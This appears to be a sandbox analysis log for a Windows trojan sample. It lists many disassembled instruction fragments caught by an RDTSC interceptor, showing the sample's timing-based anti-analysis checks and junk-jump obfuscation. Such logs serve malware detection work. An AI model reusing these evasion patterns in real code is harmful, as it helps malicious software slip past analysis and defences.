Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA0596 second address: 4FA05C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC90FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3620DC9107h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FB0341 second address: 4FB0374 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 3685C6B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F362081F5A0h 0x00000014 or si, BEC8h 0x00000019 jmp 00007F362081F59Bh 0x0000001e popfd 0x0000001f push esi 0x00000020 pop ebx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FE0DA9 second address: 4FE0DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FE0DAD second address: 4FE0E66 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F362081F5A5h 0x00000008 and esi, 26D2FE66h 0x0000000e jmp 00007F362081F5A1h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 mov si, A533h 0x0000001d pushfd 0x0000001e jmp 00007F362081F5A8h 0x00000023 xor eax, 2C8E0938h 0x00000029 jmp 00007F362081F59Bh 0x0000002e popfd 0x0000002f popad 0x00000030 push eax 0x00000031 jmp 00007F362081F5A9h 0x00000036 xchg eax, ebp 0x00000037 pushad 0x00000038 mov bx, si 0x0000003b pushad 0x0000003c mov al, F9h 0x0000003e push edi 0x0000003f pop eax 0x00000040 popad 0x00000041 popad 0x00000042 mov ebp, esp 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007F362081F5A6h 0x0000004d adc ch, 00000028h 0x00000050 jmp 00007F362081F59Bh 0x00000055 popfd 0x00000056 push esi 0x00000057 pop edi 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FE0E66 second address: 4FE0E84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F3620DC90FBh 0x00000008 pop esi 0x00000009 mov cx, bx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov edx, ecx 0x00000015 mov edi, eax 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FE0E84 second address: 4FE0E8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FC0487 second address: 4FC04A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3620DC9105h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FC04A6 second address: 4FC050E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c jmp 00007F362081F59Eh 0x00000011 and dword ptr [eax], 00000000h 0x00000014 jmp 00007F362081F5A0h 0x00000019 and dword ptr [eax+04h], 00000000h 0x0000001d pushad 0x0000001e mov di, ax 0x00000021 mov dx, cx 0x00000024 popad 0x00000025 pop ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov al, dl 0x0000002b pushfd 0x0000002c jmp 00007F362081F59Ah 0x00000031 or cx, FD88h 0x00000036 jmp 00007F362081F59Bh 0x0000003b popfd 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FC050E second address: 4FC0514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA0738 second address: 4FA074F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F362081F5A3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA074F second address: 4FA0753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA0753 second address: 4FA0762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA0762 second address: 4FA0779 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC9103h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA0779 second address: 4FA077F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA077F second address: 4FA0783 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA0783 second address: 4FA07AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F362081F5A7h 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA07AD second address: 4FA07B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA07B1 second address: 4FA07B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA07B7 second address: 4FA07D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC90FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3620DC90FAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA07D4 second address: 4FA07E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F59Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FC0298 second address: 4FC029C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FC029C second address: 4FC02A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FC02A2 second address: 4FC02F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, A3F7h 0x00000007 mov al, 88h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007F3620DC9104h 0x00000012 mov dword ptr [esp], ebp 0x00000015 jmp 00007F3620DC9100h 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F3620DC9107h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FC02F1 second address: 4FC02F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FC02F7 second address: 4FC02FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FC02FB second address: 4FC0320 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F59Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bh, B8h 0x00000011 call 00007F362081F59Ch 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FC0320 second address: 4FC0326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FC0326 second address: 4FC032A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FE068B second address: 4FE0690 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FE0690 second address: 4FE06B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 1A56B278h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F362081F5A3h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FE06B2 second address: 4FE06CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3620DC9104h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FE06CA second address: 4FE07CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F59Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ecx 0x0000000e pushad 0x0000000f mov di, ax 0x00000012 pushfd 0x00000013 jmp 00007F362081F5A0h 0x00000018 sbb ah, 00000068h 0x0000001b jmp 00007F362081F59Bh 0x00000020 popfd 0x00000021 popad 0x00000022 mov eax, dword ptr [76FB65FCh] 0x00000027 jmp 00007F362081F5A6h 0x0000002c test eax, eax 0x0000002e jmp 00007F362081F5A0h 0x00000033 je 00007F36927727CCh 0x00000039 pushad 0x0000003a jmp 00007F362081F59Eh 0x0000003f jmp 00007F362081F5A2h 0x00000044 popad 0x00000045 mov ecx, eax 0x00000047 jmp 00007F362081F5A0h 0x0000004c xor eax, dword ptr [ebp+08h] 0x0000004f pushad 0x00000050 mov ebx, 3F8D75D2h 0x00000055 mov ax, bx 0x00000058 popad 0x00000059 and ecx, 1Fh 0x0000005c jmp 00007F362081F5A5h 0x00000061 ror eax, cl 0x00000063 jmp 00007F362081F59Eh 0x00000068 leave 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c pushfd 0x0000006d jmp 00007F362081F59Dh 0x00000072 add cx, 4E06h 0x00000077 jmp 00007F362081F5A1h 0x0000007c popfd 0x0000007d mov edx, esi 0x0000007f popad 0x00000080 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FE07CB second address: 4FE07E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3620DC9108h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FE07E7 second address: 4FE083D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c mov esi, eax 0x0000000e lea eax, dword ptr [ebp-08h] 0x00000011 xor esi, dword ptr [00B64014h] 0x00000017 push eax 0x00000018 push eax 0x00000019 push eax 0x0000001a lea eax, dword ptr [ebp-10h] 0x0000001d push eax 0x0000001e call 00007F3624CDE638h 0x00000023 push FFFFFFFEh 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 call 00007F362081F5A8h 0x0000002d pop ecx 0x0000002e pushfd 0x0000002f jmp 00007F362081F59Bh 0x00000034 or ecx, 5FE41F4Eh 0x0000003a jmp 00007F362081F5A9h 0x0000003f popfd 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FE083D second address: 4FE085E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, DC62h 0x00000007 movsx edx, ax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3620DC9101h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FE085E second address: 4FE08C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ret 0x0000000a nop 0x0000000b push eax 0x0000000c call 00007F3624CDE6B3h 0x00000011 mov edi, edi 0x00000013 pushad 0x00000014 mov esi, 043459C3h 0x00000019 jmp 00007F362081F5A8h 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 mov edx, eax 0x00000023 mov eax, 3AEBE459h 0x00000028 popad 0x00000029 push eax 0x0000002a jmp 00007F362081F59Fh 0x0000002f xchg eax, ebp 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F362081F5A5h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FE08C7 second address: 4FE08CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FE08CD second address: 4FE08D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FE08D1 second address: 4FE08D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F90041 second address: 4F90045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F90045 second address: 4F90058 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC90FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F90058 second address: 4F9005E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F9005E second address: 4F900C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC90FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F3620DC9106h 0x00000012 and esp, FFFFFFF8h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a pushfd 0x0000001b jmp 00007F3620DC9103h 0x00000020 or si, 9BAEh 0x00000025 jmp 00007F3620DC9109h 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F900C3 second address: 4F900D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F362081F59Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F900D3 second address: 4F90114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC90FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007F3620DC9106h 0x00000011 push eax 0x00000012 jmp 00007F3620DC90FBh 0x00000017 xchg eax, ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov edi, 6CB95BF6h 0x00000020 movsx ebx, si 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F90114 second address: 4F9012C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F362081F5A4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F9012C second address: 4F9015B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC90FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F3620DC9106h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F9015B second address: 4F90177 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F90177 second address: 4F90296 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC90FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F3620DC9104h 0x00000011 adc ax, C438h 0x00000016 jmp 00007F3620DC90FBh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F3620DC9108h 0x00000022 adc eax, 72B9BE98h 0x00000028 jmp 00007F3620DC90FBh 0x0000002d popfd 0x0000002e popad 0x0000002f mov ebx, dword ptr [ebp+10h] 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F3620DC9104h 0x00000039 and si, 68F8h 0x0000003e jmp 00007F3620DC90FBh 0x00000043 popfd 0x00000044 jmp 00007F3620DC9108h 0x00000049 popad 0x0000004a xchg eax, esi 0x0000004b pushad 0x0000004c mov edi, ecx 0x0000004e pushfd 0x0000004f jmp 00007F3620DC90FAh 0x00000054 adc al, FFFFFF88h 0x00000057 jmp 00007F3620DC90FBh 0x0000005c popfd 0x0000005d popad 0x0000005e push eax 0x0000005f pushad 0x00000060 pushfd 0x00000061 jmp 00007F3620DC90FBh 0x00000066 add ecx, 18851ECEh 0x0000006c jmp 00007F3620DC9109h 0x00000071 popfd 0x00000072 popad 0x00000073 xchg eax, esi 0x00000074 jmp 00007F3620DC90FEh 0x00000079 mov esi, dword ptr [ebp+08h] 0x0000007c push eax 0x0000007d push edx 0x0000007e jmp 00007F3620DC9107h 0x00000083 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F90296 second address: 4F9029C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F9029C second address: 4F902C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC90FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3620DC9105h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F902C5 second address: 4F902E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F362081F59Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F902E9 second address: 4F9031A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC90FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b jmp 00007F3620DC9104h 0x00000010 mov dx, ax 0x00000013 popad 0x00000014 test esi, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov edx, ecx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F9031A second address: 4F903B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F36927BD87Ch 0x0000000f jmp 00007F362081F59Eh 0x00000014 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001b jmp 00007F362081F5A0h 0x00000020 je 00007F36927BD867h 0x00000026 pushad 0x00000027 pushad 0x00000028 mov ecx, 53E596A3h 0x0000002d mov dl, al 0x0000002f popad 0x00000030 pushfd 0x00000031 jmp 00007F362081F5A5h 0x00000036 sub cx, C4A6h 0x0000003b jmp 00007F362081F5A1h 0x00000040 popfd 0x00000041 popad 0x00000042 mov edx, dword ptr [esi+44h] 0x00000045 pushad 0x00000046 call 00007F362081F5A8h 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F903B6 second address: 4F903DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 or edx, dword ptr [ebp+0Ch] 0x00000009 pushad 0x0000000a push edi 0x0000000b mov si, 14AFh 0x0000000f pop ecx 0x00000010 popad 0x00000011 test edx, 61000000h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F3620DC90FDh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F903DC second address: 4F9043B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F362081F5A7h 0x00000009 adc al, FFFFFF9Eh 0x0000000c jmp 00007F362081F5A9h 0x00000011 popfd 0x00000012 mov dx, cx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jne 00007F36927BD804h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F362081F5A9h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F9043B second address: 4F90463 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC9101h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [esi+48h], 00000001h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3620DC90FDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F80748 second address: 4F8074C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F8074C second address: 4F80752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F80752 second address: 4F80773 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F59Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F362081F59Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F80773 second address: 4F80782 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC90FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F80782 second address: 4F807CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F362081F59Fh 0x00000009 sub si, EFAEh 0x0000000e jmp 00007F362081F5A9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 jmp 00007F362081F59Dh 0x0000001e and esp, FFFFFFF8h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
